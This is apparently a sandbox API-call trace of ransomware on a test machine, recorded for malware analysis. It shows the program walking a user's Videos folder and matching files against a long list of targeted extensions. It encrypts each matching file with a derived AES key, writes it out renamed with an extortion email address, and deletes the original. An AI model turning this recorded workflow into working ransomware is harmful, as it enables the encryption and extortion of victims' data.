	[0199.753] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0199.753] WriteFile (in: hFile=0x390, lpBuffer=0xfe83b8*, nNumberOfBytesToWrite=0xb230, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe83b8*, lpNumberOfBytesWritten=0x18a648*=0xb230, lpOverlapped=0x0) returned 1
	[0199.756] CloseHandle (hObject=0x390) returned 1
	[0199.757] CloseHandle (hObject=0x388) returned 1
	[0199.757] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv")) returned 1
	[0199.761] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\bha7xl9pvfipksxlxcfg.flv")) returned 0
	[0199.761] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe0d0410, ftCreationTime.dwHighDateTime=0x1d96c11, ftLastAccessTime.dwLowDateTime=0xcd6fd9b0, ftLastAccessTime.dwHighDateTime=0x1d972ef, ftLastWriteTime.dwLowDateTime=0xcd6fd9b0, ftLastWriteTime.dwHighDateTime=0x1d972ef, nFileSizeHigh=0x0, nFileSizeLow=0x10e21, dwReserved0=0x0, dwReserved1=0x0, cFileName="PtVGgB4.flv", cAlternateFileName="")) returned 1
	[0199.761] lstrcmpW (lpString1="PtVGgB4.flv", lpString2="..") returned 1
	[0199.761] lstrcmpW (lpString1="PtVGgB4.flv", lpString2=".") returned 1
	[0199.761] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\"
	[0199.762] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\", lpString2="PtVGgB4.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\PtVGgB4.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\PtVGgB4.flv"
	[0199.762] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\PtVGgB4.flv") returned 80
	[0199.762] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.762] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\PtVGgB4.flv", cchLength=0x50 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv") returned 0x50
	[0199.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.762] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv", lpSrch="help_decrypt_your_files") returned 0x0
	[0199.762] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv"
	[0199.762] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv") returned 80
	[0199.763] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.763] StrStrW (lpFirst=".flv", lpSrch=".") returned=".flv"
	[0199.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.763] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".flv") returned=".flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0199.763] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.764] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.764] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0199.765] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x10e21, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x10e21, lpOverlapped=0x0) returned 1
	[0199.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.768] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb330) returned 1
	[0199.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.770] CryptCreateHash (in: hProv=0xfcb330, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0199.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.770] CryptHashData (hHash=0xfb8f70, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0199.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.771] CryptDeriveKey (in: hProv=0xfcb330, Algid=0x6610, hBaseData=0xfb8f70, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb93f0) returned 1
	[0199.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.771] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10e21, dwBufLen=0x10e21 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x10e30) returned 1
	[0199.772] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.772] RtlMoveMemory (in: Destination=0xfedfb0, Source=0xfdd180, Length=0x10e21 | out: Destination=0xfedfb0) 
	[0199.772] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.772] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfedfb0*, pdwDataLen=0x18a1ec*=0x10e21, dwBufLen=0x10e30 | out: pbData=0xfedfb0*, pdwDataLen=0x18a1ec*=0x10e30) returned 1
	[0199.773] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.773] CryptDestroyKey (hKey=0xfb93f0) returned 1
	[0199.773] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.773] CryptDestroyHash (hHash=0xfb8f70) returned 1
	[0199.773] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.773] CryptReleaseContext (hProv=0xfcb330, dwFlags=0x0) returned 1
	[0199.773] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.773] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.774] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.774] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0199.774] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 122
	[0199.775] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0199.775] WriteFile (in: hFile=0x390, lpBuffer=0xfedfb0*, nNumberOfBytesToWrite=0x10e30, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfedfb0*, lpNumberOfBytesWritten=0x18a648*=0x10e30, lpOverlapped=0x0) returned 1
	[0199.778] CloseHandle (hObject=0x390) returned 1
	[0199.778] CloseHandle (hObject=0x388) returned 1
	[0199.778] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv")) returned 1
	[0199.981] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\ptvggb4.flv")) returned 0
	[0199.982] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c1bdf10, ftCreationTime.dwHighDateTime=0x1d975fb, ftLastAccessTime.dwLowDateTime=0xd7b6ca0, ftLastAccessTime.dwHighDateTime=0x1d97664, ftLastWriteTime.dwLowDateTime=0xd7b6ca0, ftLastWriteTime.dwHighDateTime=0x1d97664, nFileSizeHigh=0x0, nFileSizeLow=0x48fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="ytSeHq8iA1PZ-.swf", cAlternateFileName="YTSEHQ~1.SWF")) returned 1
	[0199.982] lstrcmpW (lpString1="ytSeHq8iA1PZ-.swf", lpString2="..") returned 1
